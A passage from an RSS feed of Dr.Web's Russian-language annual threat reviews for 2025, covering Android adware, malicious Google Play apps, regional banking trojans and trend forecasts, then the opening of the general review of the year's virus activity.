    &lt;dd&gt;Рекламные модули, которые могут быть интегрированы в Android-программы. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, эти модули собирают ряд конфиденциальных данных, а также способны загружать другие приложения и инициировать их установку.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Приложения, демонстрирующие нежелательную рекламу, которая часто ведет на вредоносные и мошеннические сайты. Они имеют общую кодовую базу с нежелательными программами &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Fictus&amp;lng=ru"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламный модуль, который злоумышленники встраивают в версии-клоны популярных Android-игр и программ. Его интеграция в программы происходит при помощи специализированного упаковщика net2share. Созданные таким образом копии ПО распространяются через различные каталоги приложений и после установки демонстрируют нежелательную рекламу.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Airpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Youmi&amp;lng=ru"&gt;&lt;b&gt;Adware.Youmi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование нежелательного рекламного модуля, который размещает рекламные ярлыки на главном экране Android-устройств.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Jiubang.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Нежелательное рекламное ПО для Android-устройств, которое при установке приложений демонстрирует баннер с рекомендуемыми к установке программами.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Inmobi&amp;lng=ru"&gt;&lt;b&gt;Adware.Inmobi&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование некоторых версий рекламного SDK Inmobi, способных совершать телефонные звонки и добавлять события в календарь Android-устройств.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Угрозы в Google Play&lt;/h3&gt;

&lt;p&gt;В 2025 году антивирусная лаборатория компании «Доктор Веб» обнаружила в каталоге Google Play более 180 вредоносных, нежелательных и рекламных программ, которые суммарно были установлены по меньшей мере 2 165 040 раз. Среди них были различные модификации троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt;, которые скрывали присутствие на зараженных устройствах и демонстрировали рекламу поверх интерфейса операционной системы и других приложений. Эти трояны распространялись под видом фоторедакторов, программ для фото- и видеосъемки и другого ПО.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/12_Android.HiddenAds.4215_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/13_Android.HiddenAds.4213_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Программы Time Shift Cam и Fusion Collage Editor были рекламными троянами &lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Под видом официального ПО криптобиржи Dydx и блокчейн-платформ Raydium и Aerodrome Finance киберпреступники распространяли трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.CoinSteal&amp;lng=ru"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;, &lt;a href="https://vms.drweb.ru/search/?q=Android.CoinSteal&amp;lng=ru"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.CoinSteal&amp;lng=ru"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt;, похищавших криптовалюту.&lt;/p&gt;

&lt;div class="img img-two mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/14_Android.CoinSteal.203_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/15_Android.CoinSteal.202_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;В программах Raydium и Dydx Exchange скрывалось троянское ПО для кражи криптовалюты&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Эти вредоносные приложения предлагали пользователям ввести мнемоническую фразу якобы для подключения криптокошелька, однако на самом деле вводимые данные отправлялись злоумышленникам. Чтобы еще больше ввести потенциальных жертв в заблуждение, формы для ввода мнемонических фраз могли быть замаскированы под запросы от других криптоплатформ.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/16_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/17_seed_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.CoinSteal.206&lt;/b&gt; демонстрирует фишинговую форму якобы от имени криптобиржи PancakeSwap и запрашивает мнемоническую фразу для доступа к криптокошельку&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В течение года наши специалисты выявили в Google Play более 80 вредоносных приложений семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, подписывающих пользователей на платные услуги. Они распространялись под видом различного ПО, включая мессенджеры, программы для фотосъемки, системные утилиты, редакторы изображений и программы для работы с документами.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/18_Android.Joker.2494_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/19_Android.Joker.2496_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Примеры выявленных троянов &lt;b&gt;Android.Joker&lt;/b&gt;: &lt;b&gt;Android.Joker.2494&lt;/b&gt; распространялся в виде мессенджера File Text Messages, а &lt;b&gt;Android.Joker.2496&lt;/b&gt; — под видом утилиты Useful Cleaner для оптимизации работы смартфона&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Киберпреступники вновь распространяли всевозможные программы-подделки &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые применяются в различных мошеннических схемах. Их основной задачей является загрузка целевых веб-страниц. Часть этих троянов злоумышленники выдавали за ПО финансовой тематики. Такие программы загружали мошеннические сайты, якобы связанные с инвестициями и онлайн-заработком, а также фишинговые сайты. Другие программы-подделки &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; распространялись под видом игр и при определенных условиях могли загружать сайты онлайн-казино и букмекеров. В общей сложности мы зафиксировали более 100 таких программ в Google Play.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/20_Android.FakeApp.1840_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/21_Android.FakeApp.1863_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Примеры приложений-подделок &lt;b&gt;Android.FakeApp&lt;/b&gt;. Троян &lt;b&gt;Android.FakeApp.1863&lt;/b&gt;, который скрывался в программе TPAO, был ориентирован на турецких пользователей и предлагал им управлять депозитами и доходами. А троян &lt;b&gt;Android.FakeApp.1840&lt;/b&gt; распространялся в виде игры Pino Bounce и мог загружать сайт онлайн-казино&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Вирусные аналитики «Доктор Веб» также обнаружили новое нежелательное рекламное ПО &lt;a href="https://vms.drweb.ru/search/?q=Adware.Adpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt;, которое скрывалось в программе Coin News Promax с информацией о криптовалютах. &lt;a href="https://vms.drweb.ru/search/?q=Adware.Adpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21912&lt;/b&gt; демонстрирует уведомления, при нажатии на которые в WebView загружается заданная C2-сервером ссылка.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/22_Adware.Adpush.21912_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Приложение Coin News Promax из Google Play являлось рекламным ПО &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Кроме того, наши специалисты выявили нежелательную программу &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, которая распространялась в виде приложения Zeus Jackpot Mania. Пользователи в игровой форме получали в нем виртуальные награды, которые затем якобы могли конвертировать в настоящие деньги и вывести из приложения.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/23_Program.FakeMoney.16_1_Zeus Jackpot Mania_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Программа Zeus Jackpot Mania представляла собой нежелательное приложение &lt;b&gt;Program.FakeMoney.16&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Для «вывода» денег программа запрашивала ряд данных, однако никаких выплат пользователи не получали.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/24_Program.FakeMoney.16_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Program.FakeMoney.16&lt;/b&gt; просит указать полное имя пользователя и сведения об учетной записи банка&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Банковские трояны&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств в 2025 году доля банковских троянов от общего числа зафиксированных вредоносных программ составила 6,94%, что чуть выше значения 6,29% годом ранее. В течение первых трех месяцев активность банковских троянов оставалась примерно на одном уровне, однако уже в начале II квартала заметно возросла. Далее она начала постепенно снижаться, достигнув годового минимума в июле. С августа число детектирований вновь стало расти и уже в октябре достигло пика. В конце года наблюдалось очередное снижение.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/25_banker_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/25_banker_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В 2025 году злоумышленники по-прежнему использовали ряд популярных семейств банковских троянов в проводимых атаках. Среди наиболее активных были вредоносные программы &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, &lt;a href="https://vms.drweb.ru/search/?q=Android.BankBot.Coper&amp;lng=ru" target="_blank"&gt;Coper&lt;/a&gt;, &lt;b&gt;Android.BankBot.Ermac&lt;/b&gt; и ряд других. Кроме того, были выявлены новые версии троянов &lt;a href="https://vms.drweb.ru/virus/?i=29204494" target="_blank"&gt;NGate&lt;/a&gt;, которые используют технологию NFC для кражи денег. Эти вредоносные программы передают злоумышленникам данные с NFC-чипа зараженных устройств, позволяя мошенникам без дальнейшего вовлечения пользователей снимать деньги со счетов жертв в банкоматах или совершать покупки с использованием бесконтактной оплаты. Среди наиболее активных были такие модификации как &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.17&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.5.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Продолжилось распространение &lt;b&gt;Android.SpyMax&lt;/b&gt; — вредоносных приложений со шпионской функциональностью, основанных на ставшем общедоступным исходном коде RAT-трояна SpyNote. Киберпреступники используют их, в том числе, и в качестве банковских троянов. Вместе с тем активность &lt;b&gt;Android.SpyMax&lt;/b&gt; по сравнению с 2024 годом снизилась. На долю этих вредоносных приложений пришлось 12,35% детектирований банковских троянов против показателя 32,04% годом ранее.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/27_Android.SpyMax_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В 2025 году российские пользователи чаще всего сталкивались с различными банковскими троянами, которые по классификации компании «Доктор Веб» входят в обширное семейство Mamont (&lt;b&gt;Android.Banker.790.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.3.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.Mamont.28.origin&lt;/b&gt;). Оно включает разнообразные вредоносные приложения, которые вирусописатели продолжают активно модифицировать и развивать. Эти программы перехватывают СМС с одноразовыми кодами от кредитных организаций и похищают данные банковских карт и другую конфиденциальную информацию.&lt;/p&gt;

&lt;p&gt;В течение года наши специалисты отмечали активность банковских троянов, нацеленных на жителей Узбекистана и сопредельных с ним государств, включая Армению, Азербайджан и Киргизию. Чаще всего на защищаемых устройствах детектировались &lt;b&gt;Android.Banker.951.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.881.origin&lt;/b&gt; и &lt;b&gt;Android.Banker.963.origin&lt;/b&gt;, крадущие проверочные СМС-коды от кредитных организаций. Киберпреступники постоянно модифицируют такие вредоносные приложения, чтобы усложнить их выявление. Турецких пользователей наиболее часто атаковали банковские трояны &lt;b&gt;Android.BankBot.Coper.12.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5685&lt;/b&gt; и &lt;b&gt;Android.Banker.864.origin&lt;/b&gt;, также способные похищать содержимое СМС-сообщений.&lt;/p&gt;

&lt;p&gt;В то же время жители Ирана столкнулись с троянами &lt;b&gt;Android.BankBot.1190.origin&lt;/b&gt;, &lt;b&gt;Android.BankBot.1191.origin&lt;/b&gt; и их модификациями. Эти вредоносные программы крадут банковскую информацию из СМС-сообщений: находят в них данные о банковских картах, счетах жертвы, количестве доступных денег, выполненных транзакциях и т. д., после чего отправляют их злоумышленникам. Они также собирают информацию о контактах из телефонной книги и способны отправлять СМС по команде атакующих.&lt;/p&gt;

&lt;p&gt;Жителей многих стран Юго-Восточной Азии и Азиатско-Тихоокеанского региона, в том числе Индонезии и Южной Кореи, атаковал троян &lt;b&gt;Android.BankBot.Remo.1.origin&lt;/b&gt;. Эта вредоносная программа использует специальные возможности (Accessibility Services) для кражи данных из установленных на зараженных устройствах приложений банков и криптокошельков. Помимо трояна Remo, южнокорейские пользователи также сталкивались с троянами &lt;b&gt;Android.BankBot.15140&lt;/b&gt;, &lt;b&gt;Android.BankBot.Ermac.6.origin&lt;/b&gt; и GoldDigger (&lt;b&gt;Android.BankBot.GoldDigger.9&lt;/b&gt;, &lt;b&gt;Android.BankBot.GoldDigger.11&lt;/b&gt;).&lt;/p&gt;

&lt;p&gt;Вредоносные программы GoldDigger применялись и против индонезийских и тайских пользователей. А банковский троян &lt;b&gt;Android.BankBot.Gigabud.1.origin&lt;/b&gt; использовался против клиентов кредитных организаций Индонезии и Малайзии. В то же время злоумышленники продолжили применять троянов MoqHao при атаках на японскую аудиторию. Распространение получили такие модификации MoqHao как &lt;b&gt;Android.Banker.672.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5063&lt;/b&gt;, &lt;b&gt;Android.Banker.740.origin&lt;/b&gt; и ряд других.&lt;/p&gt;

&lt;p&gt;Одним из банковских троянов, нацеленных на жителей Индии, стал &lt;b&gt;Android.Banker.6209&lt;/b&gt;. Троян имитирует внешний вид настоящих банковских приложений с целью кражи данных пользователей — их имен, номеров банковских карт и CVV-кодов безопасности. Кроме того, он использует зараженные устройства для скрытой добычи криптовалюты Monero. Распространение вновь получили банковские трояны RewardSteal, такие как &lt;b&gt;Android.Banker.814.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.913.origin&lt;/b&gt; и &lt;b&gt;Android.Banker.5132&lt;/b&gt;. Для кражи банковских данных они маскируются под ПО, якобы имеющее отношение к индийским кредитным организациям — например, ICICI, SBI, Axis и PM Kisan.&lt;/p&gt;

&lt;p&gt;Бразильских владельцев Android-устройств чаще всего атаковали вредоносные программы &lt;b&gt;Android.BankBot.1183.origin&lt;/b&gt;, а также ряд представителей семейства NGate — &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.9&lt;/b&gt; и &lt;b&gt;Android.Banker.NGate.14&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;В 2025 году вирусописатели продолжили использовать различные техники защиты банковских Android-троянов от анализа и детектирования. Например, распространение получили всевозможные методы обфускации и сокрытия кода, такие как DEX to C (конвертация исполняемого DEX-кода в код языка C), а также обфускация вредоносных приложений при помощи инструмента NP Manager.&lt;/p&gt;

&lt;p&gt;Популярными остались техники манипуляции с форматом ZIP-архивов, которыми фактически являются APK-файлы Android-приложений. Среди них — манипуляция с полями &lt;span class="string"&gt;compression method&lt;/span&gt; и &lt;span class="string"&gt;compressed size&lt;/span&gt; в структуре заголовка локального файла внутри APK, а также использование некорректных данных о диске в записи ECDR и CD. Подробнее о них мы рассказывали в &lt;a href="https://news.drweb.ru/show/review/?lng=ru&amp;i=14970#troj" target="_blank"&gt;прошлом обзоре&lt;/a&gt; в разделе о банковских троянах. После таких манипуляций троянские программы остаются полностью работоспособными, но многие инструменты статического анализа воспринимают их как поврежденные и неспособны обработать корректно.&lt;/p&gt;

&lt;p&gt;Вирусописатели стали активнее применять программы-дропперы для сокрытия основной полезной нагрузки, например, для обхода внутренней защиты каталога Google Play. Киберпреступники также используют ИИ-ассистентов при написании кода банковских троянов, что упрощает их разработку и ведет к появлению новых семейств. Кроме того, злоумышленники чаще используют Telegram-боты для управления банковскими троянами и эксфильтрации данных с зараженных устройств.&lt;/p&gt;

&lt;h3&gt;Перспективы и тенденции&lt;/h3&gt;

&lt;p&gt;В 2025 году мы наблюдали высокую активность рекламных троянов, которые остаются самыми распространенными угрозами для ОС Android. Широкое распространение вновь получили и различные программы-подделки, которые используются в мошеннических целях, в том числе — для фишинга и кражи денег. Кроме того, продолжился рост числа атак с использованием банковских троянов. Все эти вредоносные приложения являются источником нелегального дохода для киберпреступников, поэтому их популярность остается на высоком уровне. В следующем году они с высокой долей вероятности вновь станут одними из популярных инструментов заработка злоумышленников. При этом вирусописатели все чаще используют Telegram-боты для управления банковскими троянами. Эта тенденция, скорее всего, продолжится.&lt;/p&gt;

&lt;p&gt;Появление вредоносной программы &lt;a href="https://vms.drweb.ru/search/?q=Android.Clipper.31&amp;lng=ru"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, а также новых версий троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Vo1d&amp;lng=ru"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.Triada&amp;lng=ru"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; в прошивках смартфонов и TV-приставок говорит о сохраняющемся интересе злоумышленников в распространении вредоносного ПО способами, которые значительно усложняют его обнаружение. Весьма вероятно, что в новом году тенденция сохранится, и мы увидим новые случаи предустановки вредоносных приложений на смартфоны, ТВ-приставки и другие типы Android-устройств.&lt;/p&gt;

&lt;p&gt;Следует также ожидать появления более сложных вредоносных программ, способных выполнять широкий спектр задач. Среди них могут быть очередные бэкдоры и различные трояны-шпионы. Кроме того, вирусописатели наверняка вновь будут использовать официальные каталоги программ, в том числе Google Play, для размещения в них вредоносного и нежелательного ПО.&lt;/p&gt;

&lt;p&gt;Злоумышленники также продолжат внедрять различные способы защиты для создаваемых ими инструментов. Также они будут чаще использовать ИИ-помощников при написании кода, в результате чего стоит ожидать появления большего числа новых семейств.&lt;/p&gt;

&lt;p&gt;Компания «Доктор Веб» следит за ландшафтом угроз в мобильном сегменте и оперативно реагирует на возникающие вызовы. Пользователям Android мы рекомендуем установить Dr.Web Security Space для мобильных устройств, чтобы защитить себя от вредоносных и других опасных программ.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15102&amp;lng=ru</guid><title>«Доктор Веб»: обзор вирусной активности за 2025 год</title><link>https://news.drweb.ru/show/?i=15102&amp;lng=ru&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/virus_review_2025__ru.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;15 января 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;В 2025 году одними из самых активных угроз стали трояны, предназначенные для показа рекламы. Пользователи также сталкивались с различными вредоносными скриптами и троянскими приложениями, которые запускают в инфицированной системе другое вредоносное ПО. В почтовом трафике чаще всего выявлялись троянские программы-загрузчики, бэкдоры, эксплойты, вредоносные скрипты и фишинговые документы.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Среди мобильных угроз наибольшее распространение получили рекламные трояны и программы-подделки, используемые в различных мошеннических схемах. Также отмечался рост активности банковских троянов. При этом вирусные аналитики «Доктор Веб» обнаружили десятки новых вредоносных, нежелательных и рекламных программ в каталоге Google Play.&lt;/p&gt;

&lt;p&gt;По сравнению с 2024 годом сократилось количество обращений пользователей за расшифровкой файлов. В то же время в течение года наши интернет-аналитики фиксировали рост числа мошеннических сайтов, созданных для кражи учетных записей пользователей мессенджера Telegram. Кроме того, распространение вновь получили нежелательные сайты финансовой тематики.&lt;/p&gt;

&lt;p&gt;В 2025 году антивирусная лаборатория «Доктор Веб» расследовала несколько таргетированных атак, одна из которых была совершена на российское машиностроительное предприятие. В ходе нее злоумышленники использовали ряд вредоносных приложений, с помощью которых пытались получить конфиденциальные данные с зараженных компьютеров. Наши специалисты установили, что к атаке была причастна хакерская группировка Scaly Wolf. Другой инцидент произошел с одним из российских государственных учреждений, которое подверглось нападению хакерской группы Cavalry Werewolf. Вирусные аналитики «Доктор Веб» выявили множество вредоносных инструментов злоумышленников, а также изучили особенности группировки и характерные для нее действия внутри скомпрометированных сетей.&lt;/p&gt;

&lt;p&gt;В течение 2025 года компания «Доктор Веб» также сообщала о ряде других инцидентов информационной безопасности. В январе наша антивирусная лаборатория выявила активную кампанию по добыче криптовалюты Monero, организованную с использованием множества различных вредоносных программ. А в апреле мы проинформировали о трояне, найденном в прошивке ряда моделей Android-смартфонов. С его помощью киберпреступники похищали криптовалюту. Кроме того, в апреле наши специалисты выявили Android-трояна, которого злоумышленники внедрили в одну из версий популярной картографической программы и использовали для слежки за российскими военнослужащими.&lt;/p&gt;

&lt;p&gt;В июле эксперты «Доктор Веб» рассказали о новом семействе троянов, созданных для кражи криптовалюты и паролей. Злоумышленники распространяли их под видом модов, читов и патчей для игр. В августе вирусные аналитики предупредили о распространении многофункционального бэкдора для мобильных устройств, который был нацелен на представителей российского бизнеса. Киберпреступники управляли им дистанционно, похищая с его помощью конфиденциальные данные и следя за жертвами.&lt;/p&gt;

&lt;p&gt;В октябре мы рассказали о бэкдоре для Android-устройств, которого киберпреступники распространяют в составе модифицированных версий мессенджера Telegram X. Эта вредоносная программа похищает логины и пароли от учетных записей Telegram и другие конфиденциальные данные. С ее помощью вирусописатели могут управлять взломанными аккаунтами жертв и полностью контролировать сам мессенджер, выполняя различные действия от имени пользователей.&lt;/p&gt;

&lt;p&gt;В декабре на нашем сайте вышел материал о трояне, который «накручивает» популярность сайтов и для этого притворяется человеком, чтобы его действия не заблокировала антибот-защита интернет-площадок. Вредоносная программа самостоятельно ищет нужные сайты в поисковых системах, открывает их и выполняет клики на веб-страницах в соответствии с получаемыми от злоумышленников параметрами.&lt;/p&gt;

&lt;p&gt;В 2025 году также отмечался рост популярности атак ClickFix, при которых злоумышленники применяют социальную инженерию, чтобы пользователи самостоятельно запустили вредоносный код на своих устройствах.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции года&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Отмечалась высокая активность рекламных троянов&lt;/li&gt;
        &lt;li&gt;Произошли новые таргетированные атаки&lt;/li&gt;
        &lt;li&gt;Наблюдался рост популярности атак с применением метода ClickFix&lt;/li&gt;
        &lt;li&gt;Снизилось число инцидентов с троянскими программами-шифровальщиками&lt;/li&gt;
        &lt;li&gt;Увеличилось количество детектирований банковских троянов для Android&lt;/li&gt;
        &lt;li&gt;Были выявлены новые случаи заражения прошивок Android-устройств&lt;/li&gt;
        &lt;li&gt;В каталоге Google Play вновь распространялись различные вредоносные и нежелательные программы&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Наиболее интересные события 2025 года&lt;/h3&gt;

